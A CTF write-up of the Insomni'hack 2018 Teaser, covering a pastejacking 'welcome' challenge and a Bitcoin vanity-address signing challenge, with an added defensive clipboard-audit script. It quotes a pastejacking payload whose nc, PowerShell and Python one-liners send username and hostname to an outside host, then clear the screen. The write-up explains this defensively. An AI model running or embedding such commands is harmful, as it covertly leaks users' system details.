Insomni'hack Teaser 2018 Writeup: Welcome and Hax4Bitcoins

This past weekend was the Insomni'hack 2018 Teaser CTF, which leads up to the in-person 2018 Insomni'hack CTF. I got to play for a few hours and managed to solve a fun challenge involving Bitcoin transactions. To kick things off, they had a welcome challenge that seemed straightforward enough:
However, if you copy and paste this text, you realize it's been weaponized as a pastejacking attack:

    echo "$(whoami)@$(hostname)"|nc welcome.teaser.insomnihack.ch 42351
    say you have been pwned
    powershell -noprofile -command "$c=New-Object -TypeName System.Net.Sockets.TcpClient;$c.Connect('welcome.teaser.insomnihack.ch', 42351);$w=New-Object System.IO.StreamWriter($c.GetStream());$w.WriteLine(\"$(whoami)\")|Out-Null;$w.Close();$c.Close();"
    exec("""from socket import *\nimport platform, getpass\ns=socket(AF_INET, SOCK_STREAM)\ns.connect(("welcome.teaser.insomnihack.ch",42351))\ns.sendall("{0}@{1}[{2}]".format(getpass.getuser(),platform.node(),platform.system()).encode("utf-8"))\ns.close()""")
    clear||cls
    nc welcome.teaser.insomnihack.ch 42513
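
A defensive check for this kind of paste, added here as an example (it is not part of the original writeup or the CTF's code): compare what the page displayed with what actually reached the clipboard before it goes anywhere near a shell. The displayed command is assumed from the port the writeup says was shown (42315), the pasted sample is abbreviated from the payload above, and `audit_paste` and its finding names are hypothetical.

```python
import re

# Constructed sample. DISPLAYED is assumed from the writeup ("the original port
# displayed, 42315"); PASTED is abbreviated from the payload quoted above.
DISPLAYED = "nc welcome.teaser.insomnihack.ch 42315"
PASTED = (
    'echo "$(whoami)@$(hostname)"|nc welcome.teaser.insomnihack.ch 42351\n'
    "say you have been pwned\n"
    "clear||cls\n"
    "nc welcome.teaser.insomnihack.ch 42513\n"
)

# A dotted hostname followed by a port, separated by spaces, quotes or commas.
ENDPOINT = re.compile(r"([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)[\s'\",]+(\d{2,5})\b")
# Commands that wipe the terminal, used to hide what just ran.
SCREEN_WIPE = re.compile(r"(clear|cls|reset)\b")


def audit_paste(displayed, pasted):
    """Return (finding, detail) pairs describing how the clipboard differs."""
    findings = []
    shown = {ln.strip() for ln in displayed.splitlines() if ln.strip()}
    got = [ln.strip() for ln in pasted.splitlines() if ln.strip()]
    # A newline in the clipboard makes most terminals execute without Enter.
    if "\n" in pasted or "\r" in pasted:
        findings.append(("auto-exec", pasted.count("\n")))
    # Lines the reader never saw on the page.
    hidden = [ln for ln in got if ln not in shown]
    if hidden:
        findings.append(("hidden-lines", hidden))
    # Network endpoints that differ from the ones that were displayed.
    extra = sorted(set(ENDPOINT.findall(pasted)) - set(ENDPOINT.findall(displayed)))
    if extra:
        findings.append(("endpoint-mismatch", extra))
    if any(SCREEN_WIPE.match(ln) for ln in got):
        findings.append(("screen-wipe", "terminal is cleared after the hidden commands"))
    return findings


if __name__ == "__main__":
    for name, detail in audit_paste(DISPLAYED, PASTED):
        print(f"{name}: {detail}")
```

Pasting into a plain text editor first, or enabling bracketed paste in the shell, gives the same visibility without any tooling.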

While you shouldn't run those commands, it could be a lot worse: all this attack does is send your username and hostname back to the CTF organizers for their "wall of sheep". If you connect to any of the ports in the pastejacking payload, you are greeted with a troll message, but if you connect to the original port displayed, 42315, you get the flag:
The next challenge, Hax4Bitcoins, was pretty awesome. The creators set up a faux website where people can pay Bitcoin to have certain targets hacked once the bounties reach their goal. I thought this was a pretty funny theme, and my gut intuition was to check the transaction history to see who funded these hacks.
The site features a number of targets, and each uses its own novelty bounty address for funding. Further, at the bottom of the page you can explicitly see the vanity addresses that the owners have claimed "dibs" on, "1Hax4B".

Following the trail of Bitcoin transactions to and from these "bounty addresses", we come across a vanity address with the name "pastebin" in the Bitcoin address:

When we browse to the Pastebin page at this location, we find a special Bitcoin "signed message" from the original bounty address holder:

The signatures all check out, and this was a pretty cool introduction to Bitcoin message signing and verification for me. This confirms that the person who signed this Pastebin is the same as the one who owns the "bounty address".
The message tells us about a secret admin login site. However, when you browse to this admin login portal, it requires a bit of extra authentication: it seems we have to pass a challenge and response protocol. This was pretty reminiscent of some Bitcoin address authentication based challenge and response protocols. Further, the hint and challenge suggest we need a 1Hax4B vanity address to continue.
So the next logical step was to produce one of their special vanity Bitcoin addresses, "1Hax4B". If you go back to prior screenshots, they had claimed "dibs" on all of these addresses. I chose to use the tool govanity, a Go-based vanity Bitcoin address generator, in an attempt to generate my own "1Hax4B" address. It took a few hours to generate, as expected, and in the end I was the proud owner of a new vanity Bitcoin address:
I then imported this new address and key into an online wallet, and used that wallet to sign the authentication challenge issued by the site.
Taking this newly signed message back to the auth portal, we get the flag: